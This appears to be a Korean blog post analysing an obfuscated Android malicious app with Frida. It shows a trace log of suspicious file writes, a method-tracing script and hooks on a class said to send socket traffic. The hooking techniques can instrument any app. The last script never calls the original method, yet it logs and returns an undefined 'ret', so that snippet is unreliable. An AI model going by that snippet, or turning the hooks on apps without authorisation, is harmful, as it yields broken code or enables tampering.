[Java::FileOuputStream.write.2] Write 25 bytes from 0 ([unknow]):
0000 55 47 46 35 62 6D 39 33 51 6D 6C 36 49 31 74 64 ....bm...ml...td\n0010 49 7A 55 3D 0A 3E 0D 0A 0A 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 37 bytes from 0 ([unknow]):
0000 55 47 46 35 62 6D 39 33 51 6D 6C 36 49 31 74 51 ....bm...ml...t.\n0010 59 58 6C 75 62 33 64 43 61 58 70 64..\n7A 5 [8144] bytes of zeroesn0020 0A 3E 0D 0A 0A 00 00 00 00 00 00 00 00 00 00 00 ..
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 25 bytes from 0 ([unknow]):
0000 54 47 46 31 62 6D 4E 6F 5A 58 49 6A 57 31 30 6A ....bm.o...j...j\n0010 4D 41 3D 3D 0A 3E 0D 0A 0A 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileInputStream.read.2] Read from file,offset,len ([unknow],0,332)
[336] bytes of zeroes
---------------------------
[Java::FileOuputStream.write.2] Write 41 bytes from 0 ([unknow]):
0000 54 47 46 31 62 6D 4E 6F 5A 58 49 6A 57 2B 32 5A ....bm.o...j.+..\n0010 69 43 44 74 6D 5A 54 72 71 62 51 67..\n53 3 [8144] bytes of zeroesn0020 58 53 4D 31 0A 3E 0D 0A 0A 00 00 00 00 00 00 00 ......
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
---------------------------
[Java::FileOuputStream.write.2] Write 25 bytes from 0 ([unknow]):
0000 54 47 46 31 62 6D 4E 6F 5A 58 49 6A 57 31 30 6A ....bm.o...j...j\n0010 4D 41 3D 3D 0A 3E 0D 0A 0A 00 00 00..\n00 0 [8160] bytes of zeroes
---------------------------
[Java::File.new.1] New file : /storage/emulated/0
---------------------------
[Java::FileOuputStream.new.1] New output stream to file ([unknow]):
frida java backtrace
https://stackoverflow.com/questions/48480980/print-stacktrace-using-frida
http://linforum.kr/bbs/board.php?bo_table=android&wr_id=532
코드
/**
It should be launch earlier in order to be aware of a maximun
quantity of file descriptors.
@author @FrenchYeti
*/
Java.perform(function () {
var logContentArray = new Array();
var singlePrefix = '|-';
function uniqBy(array, key) {
var seen = {};
return array.filter(function (item) {
var k = key(item);
return seen.hasOwnProperty(k) ? false : (seen[k] = true);
});
}
function traceClass(targetClass) {
var hook = Java.use(targetClass);
var methods = hook.class.getDeclaredMethods();
hook.$dispose;
var parsedMethods = [];
methods.forEach(function (method) {
parsedMethods.push(
method
.toString()
.replace(targetClass + '.', 'TOKEN')
.match(/\sTOKEN(.*)\(/)[1]
);
});
var targets = uniqBy(parsedMethods, JSON.stringify);
targets.forEach(function (targetMethod) {
traceMethod(targetClass + '.' + targetMethod);
});
}
// usage examples
function traceMethod(targetClassMethod) {
var delim = targetClassMethod.lastIndexOf('.');
if (delim === -1) return;
var targetClass = targetClassMethod.slice(0, delim);
var targetMethod = targetClassMethod.slice(
delim + 1,
targetClassMethod.length
);
var hook = Java.use(targetClass);
var overloadCount = hook[targetMethod].overloads.length;
console.log(
'Tracing ' + targetClassMethod + ' [' + overloadCount + ' overload(s)]'
);
for (var i = 0; i < overloadCount; i++) {
hook[targetMethod].overloads[i].implementation = function () {
var logContent_1 = 'entered--' + targetClassMethod;
var prefixStr = gainLogPrefix(logContentArray);
logContentArray.push(prefixStr + logContent_1);
console.log(prefixStr + logContent_1);
for (var j = 0; j < arguments.length; j++) {
var tmpLogStr = prefixStr + 'arg[' + j + ']: ' + arguments[j];
console.log(tmpLogStr);
}
var retval = this[targetMethod].apply(this, arguments);
var tmpReturnStr = prefixStr + 'retval: ' + retval;
console.log(tmpReturnStr);
var logContent_ex = 'exiting--' + targetClassMethod;
console.log(prefixStr + logContent_ex);
return retval;
};
}
}
function gainLogPrefix(theArray) {
var lastIndex = theArray.length - 1;
if (lastIndex < 0) {
return singlePrefix;
}
for (var i = lastIndex; i >= 0; i--) {
var tmpLogContent = theArray[i];
var cIndex = tmpLogContent.indexOf('entered--');
if (cIndex == -1) {
var cIndex2 = tmpLogContent.indexOf('exiting--');
if (cIndex2 == -1) {
continue;
} else {
var resultStr = tmpLogContent.slice(0, cIndex2);
return resultStr;
}
} else {
var resultStr = singlePrefix + tmpLogContent.slice(0, cIndex); //replace(/entered--/, "");
return resultStr;
}
}
return '';
}
setTimeout(function () {
Java.perform(function () {
traceClass(
'keen.cache.qfjmcewnnxsjvwarbjgoxrqijnavtgyoxwtkygqqumlggkfnla2.heyskfqaiyiagrkxrskdbenbypsxoghbajiuihcxiyrrhzcmtq27'
);
//traceClass("com.xxx.Application");
});
}, 0);
});
socket을 날리는 run 함수를 후킹해봤다.
함수 frida 코드 가져오기
함수 코드
let b = Java.use("keen.cache.qfjmcewnnxsjvwarbjgoxrqijnavtgyoxwtkygqqumlggkfnla2.heyskfqaiyiagrkxrskdbenbypsxoghbajiuihcxiyrrhzcmtq27$b");
b["run"].implementation = function () {
console.log('run is called');
let ret = this.run();
console.log('run ret value is ' + ret);
return ret;
};
후킹코드 제작
http://linforum.kr/bbs/board.php?bo_table=android&wr_id=532
/**
* It should be launched earlier to be aware of a maximum quantity of file descriptors.
*
* @author @FrenchYeti
*/
Java.perform(function () {
var ThreadDef = Java.use('java.lang.Thread');
var ThreadObj = ThreadDef.$new();
function stackTrace() {
var stack = ThreadObj.currentThread().getStackTrace();
for (var i = 0; i < stack.length; i++) {
console.log(i + ' => ' + stack[i].toString());
}
console.log('-------------------------------------');
}
var b = Java.use(
'keen.cache.qfjmcewnnxsjvwarbjgoxrqijnavtgyoxwtkygqqumlggkfnla2.heyskfqaiyiagrkxrskdbenbypsxoghbajiuihcxiyrrhzcmtq27$b'
);
b.run.implementation = function () {
console.log('run is called');
stackTrace();
console.log('run ret value is ' + ret);
return ret;
};
});
하지만…
socket은 날라가고 있었다.
'Android' 카테고리의 다른 글
SpyNote - certapp.apk 악성앱 분석 (1) | 2023.12.28 |
---|---|
Android Nox 인증서 설치 (1) | 2023.12.28 |
IoS Fiddler 프록시 설정 - 노트북 연결 x (1) | 2023.12.28 |
Android 프록시 인증서 세팅 (0) | 2023.12.28 |
Android frida server 세팅 (0) | 2023.12.28 |